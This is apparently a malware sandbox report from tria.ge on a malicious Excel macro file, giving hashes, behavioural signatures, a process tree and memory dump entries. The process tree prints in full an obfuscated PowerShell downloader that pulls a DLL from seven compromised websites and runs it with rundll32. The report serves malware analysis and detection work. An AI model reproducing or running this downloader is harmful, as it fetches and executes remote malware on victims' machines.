Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

24/11/2021, 17:59

211124-wk8rgsddbm 10

22/11/2021, 14:46

211122-r5n6csagd6 10

22/11/2021, 14:46

211122-r5csbsfgdp 10

22/11/2021, 14:44

211122-r4kfsafgdn 10

22/11/2021, 14:41

211122-r2x9vsfgcq 10

22/11/2021, 14:20

211122-rneklaffgr 10

22/11/2021, 14:15

211122-rkk8zaffgl 10

17/11/2021, 06:51

211117-hm1l1aeefm 10

17/11/2021, 06:37

211117-hdnk3seedn 10

Analysis

  • max time kernel
    88s
  • max time network
    83s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    22/11/2021, 14:15

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
          PID:1268
    • C:\Windows\system32\mmc.exe
      "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
      1⤵
      • Drops file in System32 directory
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:400

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/400-281-0x000000001CF20000-0x000000001CF22000-memory.dmp

      Filesize

      8KB

    • memory/400-289-0x000000001CF2A000-0x000000001CF2F000-memory.dmp

      Filesize

      20KB

    • memory/400-288-0x000000001CF28000-0x000000001CF2A000-memory.dmp

      Filesize

      8KB

    • memory/400-287-0x00007FF658680000-0x00007FF658681000-memory.dmp

      Filesize

      4KB

    • memory/400-286-0x000000001CF27000-0x000000001CF28000-memory.dmp

      Filesize

      4KB

    • memory/400-284-0x000000001CF25000-0x000000001CF26000-memory.dmp

      Filesize

      4KB

    • memory/400-285-0x000000001CF26000-0x000000001CF27000-memory.dmp

      Filesize

      4KB

    • memory/400-283-0x000000001CF24000-0x000000001CF25000-memory.dmp

      Filesize

      4KB

    • memory/400-282-0x000000001CF22000-0x000000001CF24000-memory.dmp

      Filesize

      8KB

    • memory/2720-119-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

      Filesize

      64KB

    • memory/2720-122-0x00000205530E0000-0x00000205530E2000-memory.dmp

      Filesize

      8KB

    • memory/2720-120-0x00000205530E0000-0x00000205530E2000-memory.dmp

      Filesize

      8KB

    • memory/2720-121-0x00000205530E0000-0x00000205530E2000-memory.dmp

      Filesize

      8KB

    • memory/2720-115-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

      Filesize

      64KB

    • memory/2720-118-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

      Filesize

      64KB

    • memory/2720-117-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

      Filesize

      64KB

    • memory/2720-116-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

      Filesize

      64KB